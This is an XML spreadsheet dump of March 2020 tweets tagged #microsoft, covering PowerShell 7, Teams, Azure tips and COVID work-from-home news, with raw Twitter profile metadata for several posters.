    <t>{'id': 2855879919, 'id_str': '2855879919', 'name': 'Nagesh Rao,Duvvuri', 'screen_name': 'NageshDuvvuri', 'location': 'London, UK', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 295, 'friends_count': 118, 'listed_count': 10, 'created_at': 'Sun Nov 02 00:33:36 +0000 2014', 'favourites_count': 229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3466,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'http://pbs.twimg.com/profile_images/1042150177430286343/St2YdKLm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042150177430286343/St2YdKLm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2855879919/1429909233',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</si>
  <si>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07:00:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Announces PowerShell 7 #powershell7 #microsoft https://t.co/kiAEdBOfRa https://t.co/dpuia7bSEx</t>
  </si>
  <si>
    <t>Thu Mar 05 07:00:00 +0000 2020</t>
  </si>
  <si>
    <t>This is from Monday's #azure and #modernworkplace partners events in partnership with Microsoft.  
Thanks to the team at Microsoft, Ingram Micro, and our team for this successful event.
@Azure @Microsoft @IngramMicroInc
#microsoft #ingrammicro #azure #oman #cybersecurity https://t.co/5my0aZphov</t>
  </si>
  <si>
    <t>{'id': 2394073592, 'id_str': '2394073592', 'name': 'Decoding IT Solution', 'screen_name': 'DecodingIT', 'location': 'Muscat, Sultanate of Oman', 'description': 'A team of skilled IT professionals based in Muscat bringing you the best - best products &amp; best practices. We make IT EASY- Effective And Success Yeilding', 'url': 'https://t.co/E21Mqly6L3', 'entities': {'url': {'urls': [{'url': 'https://t.co/E21Mqly6L3', 'expanded_url': 'http://www.decodingitsolutions.com', 'display_url': 'decodingitsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 51, 'friends_count': 68, 'listed_count': 4, 'created_at': 'Mon Mar 17 09:15:55 +0000 2014', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 598, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '008080', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/689853989580623872/10J9-mHk_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/689853989580623872/10J9-mHk_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2394073592/1455807585', 'profile_link_color': '000000',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</si>
  <si>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06:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Free #Webinar - Intro Into #SQLServer Index Analysis. 5th March (9:30-10:300 PM GMT)
https://t.co/OBcjmGZTvC
#tsql #sqldba #performance #microsoft #madeiradata https://t.co/MruH51oxQk</t>
  </si>
  <si>
    <t>Thu Mar 05 06:56:43 +0000 2020</t>
  </si>
  <si>
    <t>Hey all, 343 (the house of @halo) is looking for a Sr. Tech Animator that we can bestow all our love on.  You'd be working with me and the crew on Infinite, @ me if you're lfw #techanimator #jobs #microsoft #343industries &amp;lt;3</t>
  </si>
  <si>
    <t>{'id': 28741433, 'id_str': '28741433', 'name': 'Will Waltz', 'screen_name': 'willwaltz', 'location': 'The Greater Seattle Area', 'description': '343i @halo &amp; Solo GameDev | Filmmaker | Photographer -Getty/VCG | Optimistic Futurist | willwaltz.eth @Brave Creator https://t.co/MNCP3QqhVrâ€¦', 'url': 'https://t.co/UBWrcaNadT', 'entities': {'url': {'urls': [{'url': 'https://t.co/UBWrcaNadT', 'expanded_url': 'http://theskyfolk.com', 'display_url': 'theskyfolk.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/MNCP3QqhVr', 'expanded_url': 'http://youtube.com/willchristians', 'display_url': 'youtube.com/willchristians', 'indices': [117, 140]}]}}, 'protected': False, 'followers_count': 1449, 'friends_count': 694, 'listed_count': 40, 'created_at': 'Sat Apr 04 04:41:17 +0000 2009', 'favourites_count': 2904, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3225, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '344857', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1125434052243144704/4s91Teor_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125434052243144704/4s91Teor_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28741433/1517519184',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</si>
  <si>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Mar 05 06:55:50 +0000 2020</t>
  </si>
  <si>
    <t>Today #microsoft and ICONICS, Inc.  will exchange business opportunities on the Danish Enterprise and National Companies and define strategic action plans at MS HQ in Copenhagen. #bettertogether
#iconics #digitaltwins #transformyourbusiness #iiot #digita...https://t.co/idbhs8ze2r</t>
  </si>
  <si>
    <t>{'id': 311928962, 'id_str': '311928962', 'name': 'Arthur Blom', 'screen_name': 'Arthur_Blom', 'location': 'Netherlands', 'description': 'Software Sales Area Manager | Industrial Automation | Think Solutions | Software &amp; Analytics | Innovation | Passion for technology', 'url': 'https://t.co/3B23kOunR9', 'entities': {'url': {'urls': [{'url': 'https://t.co/3B23kOunR9', 'expanded_url': 'http://www.ICONICS.com', 'display_url': 'ICONICS.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 225, 'friends_count': 233, 'listed_count': 12, 'created_at': 'Mon Jun 06 09:19:15 +0000 2011', 'favourites_count': 261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1101,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'http://pbs.twimg.com/profile_images/1100058283686195200/1NYwWljH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100058283686195200/1NYwWljH_normal.png', 'profile_link_color': '0D9900',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</si>
  <si>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06:51:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announced the Generally Available (GA) release of #PowerShell 7.0 #MSFTAdvocate https://t.co/8Jgr7OMFtU</t>
  </si>
  <si>
    <t>{'id': 15736299, 'id_str': '15736299', 'name': 'Sarmad Jari', 'screen_name': 'sarmadjari', 'location': 'Oslo, Norway', 'description': 'Senior Cloud Solution Architect at Microsoft \n\nENJOYING EVERY BIT...', 'url': 'https://t.co/j3tGGTQfLs', 'entities': {'url': {'urls': [{'url': 'https://t.co/j3tGGTQfLs', 'expanded_url': 'http://about.me/sjari', 'display_url': 'about.me/sjari', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 206, 'friends_count': 551, 'listed_count': 65, 'created_at': 'Tue Aug 05 14:09:28 +0000 2008', 'favourites_count': 392, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2028,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'http://pbs.twimg.com/profile_images/944176945545302016/PM8VBxiQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/944176945545302016/PM8VBxiQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15736299/1459601126',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</si>
  <si>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06:50:36 +0000 2020</t>
  </si>
  <si>
    <t>Thanks #MicrosoftHK for publishing one of my live presentations video about #DevOps on their youtube channel here https://t.co/5CkFme9zt1
If you want more videos, on #DevOps, #Azure, #Coding and #Microsoft please check out my channel as well https://t.co/prataL60ee</t>
  </si>
  <si>
    <t>{'id': 1238953350, 'id_str': '1238953350', 'name': 'Davide Benvegnu', 'screen_name': 'DavideBenvegnu', 'location': 'Hong Kong', 'description': 'DevOps Architect at Microsoft. C# coder. Founder of HKMSC. Member of DotNetToscana. #MMA fighter. Not in that order. Tweets are my own.', 'url': 'https://t.co/RDFWQ5oSxP', 'entities': {'url': {'urls': [{'url': 'https://t.co/RDFWQ5oSxP', 'expanded_url': 'http://www.davidebenvegnu.com', 'display_url': 'davidebenvegnu.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 509, 'friends_count': 313, 'listed_count': 138, 'created_at': 'Sun Mar 03 13:57:33 +0000 2013', 'favourites_count': 1191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4327,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'http://pbs.twimg.com/profile_images/1022438707238821888/IiqwFFpi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1022438707238821888/IiqwFFpi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1238953350/1553595078', 'profile_link_color': '3B94D9',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</si>
  <si>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06:45:46 +0000 2020</t>
  </si>
  <si>
    <t>Do you know that you can start a conversation in your document without swapping the screen or tab?
You can start the conversation button in the document to tag the person that you wish to inform about.
*Just with 3 simple steps!*
#Teams #microsoft #Tips #Tricks https://t.co/T7A7Ggfmyl</t>
  </si>
  <si>
    <t>Thu Mar 05 06:37:09 +0000 2020</t>
  </si>
  <si>
    <t>The @IRStaxpros Decided to Get Tough Against @Microsoft. #Microsoft Got Tougher https://t.co/KHYVQeezpg #HighestRecommendation #MoneyTalks #WhoeverHasTheGold #MakesTheRules #GovBoughtAndPaidFor</t>
  </si>
  <si>
    <t>{'id': 171800685, 'id_str': '171800685', 'name': 'Ä‹Ñ§×§á¹­Ñ§Ä±á¹… áº“ÊŸÈÉ¢', 'screen_name': 'Spaceconveyor', 'location': 'State of trepidation ', 'description': "'Broken promises don't upset me, I just think, why did they believe me?' ~John Handey~         l mostly retweet.  https://t.co/2BjKgF11BQ", 'url': 'https://t.co/pyhtJYolbn', 'entities': {'url': {'urls': [{'url': 'https://t.co/pyhtJYolbn', 'expanded_url': 'https://www.lupusresearch.org/', 'display_url': 'lupusresearch.org', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/2BjKgF11BQ', 'expanded_url': 'http://spaceconveyor.tumblr.com', 'display_url': 'spaceconveyor.tumblr.com', 'indices': [114, 137]}]}}, 'protected': False, 'followers_count': 189, 'friends_count': 2181, 'listed_count': 20, 'created_at': 'Wed Jul 28 05:38:15 +0000 2010', 'favourites_count': 4410, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27323,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'http://pbs.twimg.com/profile_images/1175358399959261187/VfoZNvjD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175358399959261187/VfoZNvjD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/171800685/1569923116',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</si>
  <si>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06:36:30 +0000 2020</t>
  </si>
  <si>
    <t>How to Disable Automatic Reply from Outlook 2013, 2016 &amp;amp; 2019? | PCGUIDE4U
https://t.co/Y60UJfKFm4
#Outlook #Microsoft https://t.co/Jl8txU4fkx</t>
  </si>
  <si>
    <t>{'id': 1463291562, 'id_str': '1463291562', 'name': 'Sandeep Rawat', 'screen_name': 'rawatsamrose', 'location': 'New Delhi, India', 'description': 'A Technical Blogger by Passion. Itâ€™s a long journey of around 10 years till Dec 2017. Youâ€™re most welcome to visit my Blog to fix your computer issues.', 'url': 'https://t.co/JWckPGdAqm', 'entities': {'url': {'urls': [{'url': 'https://t.co/JWckPGdAqm', 'expanded_url': 'https://pcguide4u.com', 'display_url': 'pcguide4u.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 43, 'listed_count': 0, 'created_at': 'Mon May 27 22:46:53 +0000 2013', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 309,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'http://pbs.twimg.com/profile_images/1104773003215167489/CCS1YlIa_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1104773003215167489/CCS1YlIa_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1463291562/1553447374',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</si>
  <si>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06:35:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will soon enable Scheduled meetings and Meeting recordings for free edition of Teams https://t.co/ZmJrqGMVnf #microsoft #feedly</t>
  </si>
  <si>
    <t>{'id': 2188027502, 'id_str': '2188027502', 'name': 'DIE WIENBURG.', 'screen_name': 'die_wienburg', 'location': 'MÃ¼nster, DE', 'description': 'IT news &amp; updates - daily | #Office365 #Microsoft365 \n#DigitaleBildung #DigitalTransformation | about: https://t.co/RFdb4Lgdkb', 'url': 'https://t.co/LQvfY2u9aQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/LQvfY2u9aQ', 'expanded_url': 'http://www.die-wienburg.com', 'display_url': 'die-wienburg.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/RFdb4Lgdkb', 'expanded_url': 'http://www.die-wienburg.eu/p/impressum.html', 'display_url': 'die-wienburg.eu/p/impressum.htâ€¦', 'indices': [103, 126]}]}}, 'protected': False, 'followers_count': 16215, 'friends_count': 15598, 'listed_count': 188, 'created_at': 'Mon Nov 11 09:18:06 +0000 2013', 'favourites_count': 6603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45584,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'http://pbs.twimg.com/profile_images/1141579184273285120/oYUiKWgq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141579184273285120/oYUiKWgq_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2188027502/1561007890',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</si>
  <si>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06:31:57 +0000 2020</t>
  </si>
  <si>
    <t>#surveillance disguised as "telemetry"
#microsoft #malware #android https://t.co/JwEzf8E6I6</t>
  </si>
  <si>
    <t>Thu Mar 05 06:29:37 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft Office for #Android is #malware 
But #google #proprietarysoftware is too, so Google won't ban it https://t.co/DTlTRfxcRr</t>
  </si>
  <si>
    <t>Thu Mar 05 06:29:03 +0000 2020</t>
  </si>
  <si>
    <t>For the next @NFL season, all 32 teams will exclusively use @Microsoft Teams.
#stws #nfl #microsoft #sportstech #sportstechnology #footballtech #microsoftteams #football #sportsbiz
https://t.co/UyZs3PDUQL</t>
  </si>
  <si>
    <t>{'id': 3146273625, 'id_str': '3146273625', 'name': 'Sports Tech World Series', 'screen_name': 'sportstechws', 'location': 'Worldwide', 'description': "The world's largest community for Sports Digital, Sports Technology and Sports Innovators #STCWorldSeries #SportsData", 'url': 'https://t.co/sEnjSTKw62', 'entities': {'url': {'urls': [{'url': 'https://t.co/sEnjSTKw62', 'expanded_url': 'http://www.sportstechworldseries.com', 'display_url': 'sportstechworldseries.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4875, 'friends_count': 10747, 'listed_count': 145, 'created_at': 'Wed Apr 08 03:16:50 +0000 2015', 'favourites_count': 1832, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3034,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'http://pbs.twimg.com/profile_images/715347577395253248/T6TXjCX2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/715347577395253248/T6TXjCX2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3146273625/1428463738',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</si>
  <si>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06:28:54 +0000 2020</t>
  </si>
  <si>
    <t>@Azure Exam AZ-300 tip:
#microsoft #MicrosoftAzure #Azure #LinkedInLearning 
https://t.co/OySeas11JB</t>
  </si>
  <si>
    <t>Thu Mar 05 06:24:44 +0000 2020</t>
  </si>
  <si>
    <t>love one very overused word in the English language. Please someone should addd this definition to the dictionary #Irvine   #ecchi #microsoft https://t.co/lk5DxFgZzP</t>
  </si>
  <si>
    <t>{'id': 1235346473979703296, 'id_str': '1235346473979703296', 'name': 'Latoya Smith', 'screen_name': 'nafiventest', 'location': 'Sioux Falls, USA', 'description': 'When you realize you want to spend the rest of your life with somebody, you want the rest of your life to start as soon as possible.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Wed Mar 04 23:28:51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'http://pbs.twimg.com/profile_images/1235355177332457472/4CqLHFWL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235355177332457472/4CqLHFWL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235346473979703296/1583366639',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</si>
  <si>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06:24:36 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 is still broken thanks to a recent update from Microsoft  heres how to fix it https://t.co/V7SjTQk4Qc #goodMorning #fail #Microsoft</t>
  </si>
  <si>
    <t>{'id': 17763125, 'id_str': '17763125', 'name': 'azvezdev', 'screen_name': 'azvezdev', 'location': 'Vitosha mountain', 'description': '', 'url': 'http://t.co/brsXeEEnga', 'entities': {'url': {'urls': [{'url': 'http://t.co/brsXeEEnga', 'expanded_url': 'http://city.zvezdev.net', 'display_url': 'city.zvezdev.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 218, 'friends_count': 566, 'listed_count': 12, 'created_at': 'Sun Nov 30 21:23:25 +0000 2008', 'favourites_count': 2544, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16820,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'http://pbs.twimg.com/profile_images/65914501/S6301695_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/65914501/S6301695_normal.JPG',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</si>
  <si>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06:23:00 +0000 2020</t>
  </si>
  <si>
    <t>We will train you with our best minds and unparalleled training design. If you believe you can do it, we will make it happen. #Microsoft #codinglife #Namibia https://t.co/QOO5mBtD6l</t>
  </si>
  <si>
    <t>{'id': 2420232618, 'id_str': '2420232618', 'name': '#Exedin_Voted The Best ICT Training Center 2019', 'screen_name': 'Exedin1', 'location': 'Windhoek, Namibia', 'description': 'The only Microsoft Silver Learning Partner, EC-COUNCIL, VMware, Fortinet and CompTIA Authorized Partner in Namibia. Also a PearsonVue test Center', 'url': 'https://t.co/uRhxHZs5iX', 'entities': {'url': {'urls': [{'url': 'https://t.co/uRhxHZs5iX', 'expanded_url': 'http://www.exedin.com', 'display_url': 'exedin.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 689, 'friends_count': 2773, 'listed_count': 48, 'created_at': 'Mon Mar 31 08:47:16 +0000 2014', 'favourites_count': 273, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2332,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'http://pbs.twimg.com/profile_images/1082617806758309891/tH3O-YJ5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082617806758309891/tH3O-YJ5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2420232618/1549011094',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</si>
  <si>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06:21:36 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft recommend Seattle employees work from home where possible https://t.co/uMQu4NVJup #microsoft #feedly</t>
  </si>
  <si>
    <t>Thu Mar 05 06:18:38 +0000 2020</t>
  </si>
  <si>
    <t>Understanding Azure DevOps service 2020 Self-hosted and Microsoft cloud-hosted agents in much greater detail
#microsoft #azure #selfhosted #devops #ci #cd #cicd #executeautomation #cloud #azuredevops
https://t.co/U6rFUwhAYU https://t.co/ptvKxmCbgq</t>
  </si>
  <si>
    <t>{'id': 3076422607, 'id_str': '3076422607', 'name': 'ExecuteAutomation', 'screen_name': 'ExecuteAuto', 'location': 'Auckland, New Zealand', 'description': 'ExecuteAutomation helps people to understand software, automation, IoT, cloud, testing and more..', 'url': 'https://t.co/XpPf2JfXAP', 'entities': {'url': {'urls': [{'url': 'https://t.co/XpPf2JfXAP', 'expanded_url': 'http://www.executeautomation.com', 'display_url': 'executeautomation.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 517, 'friends_count': 177, 'listed_count': 48, 'created_at': 'Fri Mar 13 09:37:45 +0000 2015', 'favourites_count': 75, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1028,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'http://pbs.twimg.com/profile_images/703423779922259968/1yDQ0CEH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/703423779922259968/1yDQ0CEH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3076422607/1545800948',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</si>
  <si>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06:18:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft doesn't clean up its DNS records when dropping subsites. Consequence: a site like https://t.co/LgCZok6yJS could be a phishing site.
Microsoft urls: #doyoutrustIT?
Full story at @TheRegister: https://t.co/uqMQZRpXhG</t>
  </si>
  <si>
    <t>{'id': 3197336577, 'id_str': '3197336577', 'name': 'Hugo Jonker', 'screen_name': 'hugojonker', 'location': 'Security &amp; privacy expert', 'description': 'Assistant Professor @ Open Universiteit Netherlands', 'url': 'http://t.co/qKljwtnBMI', 'entities': {'url': {'urls': [{'url': 'http://t.co/qKljwtnBMI', 'expanded_url': 'http://www.open.ou.nl/hjo/', 'display_url': 'open.ou.nl/hjo/', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 191, 'friends_count': 138, 'listed_count': 26, 'created_at': 'Thu Apr 23 09:33:55 +0000 2015', 'favourites_count': 919, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1662,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'http://pbs.twimg.com/profile_images/1175026746040737793/F3fLqTf6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175026746040737793/F3fLqTf6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3197336577/1568985828',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</si>
  <si>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06:14:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/r4aRByUKxa</t>
  </si>
  <si>
    <t>{'id': 1045943081118269440, 'id_str': '1045943081118269440', 'name': 'The Pigeon Express - TPE', 'screen_name': 'PigeonExpress_', 'location': 'online', 'description': 'The Pigeon Express - TPE Official \nThe Parallel News Keeper #TPEoorhh || Instagram: thepigeonexpress', 'url': 'https://t.co/zke0xAXN4z', 'entities': {'url': {'urls': [{'url': 'https://t.co/zke0xAXN4z', 'expanded_url': 'https://www.thepigeonexpress.com', 'display_url': 'thepigeonexpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 925, 'friends_count': 71, 'listed_count': 1, 'created_at': 'Sat Sep 29 07:47:17 +0000 2018', 'favourites_count': 2166, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13657,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'http://pbs.twimg.com/profile_images/1045945050289430528/8eVx32Px_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045945050289430528/8eVx32Px_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1045943081118269440/1569403903', 'profile_link_color': 'FF0800',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</si>
  <si>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Well I was planning on writing tonight, but #Windows10 has been updating for hours. What did #Microsoft do, rewrite the entire OS?
#writercommunity #writerslife #Writingcommunity</t>
  </si>
  <si>
    <t>{'id': 22584973, 'id_str': '22584973', 'name': 'Spectral Ink', 'screen_name': 'SpectralInk', 'location': 'Lake Forest, CA', 'description': 'Computer Animation Start-up', 'url': 'http://t.co/0sqx3mg7oz', 'entities': {'url': {'urls': [{'url': 'http://t.co/0sqx3mg7oz', 'expanded_url': 'http://www.the-last-rite.com', 'display_url': 'the-last-rite.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 386, 'friends_count': 633, 'listed_count': 53, 'created_at': 'Tue Mar 03 04:26:38 +0000 2009', 'favourites_count': 106, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3058, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1C421B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/3364554929/1dd797ce04fdb83433d692d9a2a7f1ac_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3364554929/1dd797ce04fdb83433d692d9a2a7f1ac_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22584973/1435939416', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 06:13:27 +0000 2020</t>
  </si>
  <si>
    <t>What is this week new in #Microsoft #Intune? You can read it here: https://t.co/FggyZgZeNA #EMS #Azure</t>
  </si>
  <si>
    <t>{'id': 132839783, 'id_str': '132839783', 'name': 'Jeroen Burgerhout â˜ï¸', 'screen_name': 'BurgerhoutJ', 'location': 'Zuid-Holland, Nieuwkoop', 'description': 'Microsoft Cloud Consultant | #Azure | #HyperV | #Microsoft365 | #Intune | #AzureAD | â¤ @GriffioenS &amp; @MiniBurgerhout  | CEO (Chief Everything Officer) | ðŸ“¸', 'url': 'https://t.co/wqFWqJLKIK', 'entities': {'url': {'urls': [{'url': 'https://t.co/wqFWqJLKIK', 'expanded_url': 'http://jeroenburgerhout.nl', 'display_url': 'jeroenburgerhout.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 407, 'friends_count': 415, 'listed_count': 28, 'created_at': 'Wed Apr 14 09:30:18 +0000 2010', 'favourites_count': 815, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13168,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'http://pbs.twimg.com/profile_images/1199788545742901248/K-gqkd4m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199788545742901248/K-gqkd4m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/132839783/1486030992', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'F5F5F5', 'profile_sidebar_fill_color': 'F5F5F5', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 06:13:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Announces New Game Pass Titles for Console and PC #gamepass #xbox #microsoft https://t.co/YQYJQXKKP2 https://t.co/n1WxLM4soT</t>
  </si>
  <si>
    <t>Thu Mar 05 06:12:05 +0000 2020</t>
  </si>
  <si>
    <t>Update to the #Microsoft Authenticator app now rolling out https://t.co/CT9OQHaXiV #Mobile #MFA #authentication #Cloud #Security via @Alex_A_Simons https://t.co/8cKblciWsE</t>
  </si>
  <si>
    <t>Thu Mar 05 06:11:46 +0000 2020</t>
  </si>
  <si>
    <t>How to Change #Microsoft Edge default Search Engine to Google from Bing https://t.co/4242u3v5Kx #howto #browser</t>
  </si>
  <si>
    <t>{'id': 14787803, 'id_str': '14787803', 'name': 'Geekiest.Net', 'screen_name': 'geekiestnet', 'location': 'India', 'description': 'Giveaways, Free full version software licenses, Free anti-virus,  Tips and Tricks, C# programming', 'url': 'http://t.co/CqjBk6meQx', 'entities': {'url': {'urls': [{'url': 'http://t.co/CqjBk6meQx', 'expanded_url': 'http://geekiest.net', 'display_url': 'geekiest.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2613, 'friends_count': 489, 'listed_count': 82, 'created_at': 'Thu May 15 15:58:49 +0000 2008', 'favourites_count': 635, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10207,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'http://pbs.twimg.com/profile_images/776468808/char_slim_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/776468808/char_slim_normal.jpg', 'profile_link_color': '79868C',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</si>
  <si>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06:11:16 +0000 2020</t>
  </si>
  <si>
    <t>Azure PowerShell Az: List and Set Azure Subscription
 #AzurePowerShell #DevOps #Microsoft #AzureFamily
https://t.co/SNvKvxNsoA</t>
  </si>
  <si>
    <t>Thu Mar 05 06:08:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft offers premium Teams for free over the next six months due to #coronavirus
 https://t.co/tW8utqzJei</t>
  </si>
  <si>
    <t>Thu Mar 05 06:05:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Tells US Employees To Work From Home Till March 25 #Kalingatv #Microsoft #coronavirus #CoronavirusEmergency #US
https://t.co/TiNNSdIdNN</t>
  </si>
  <si>
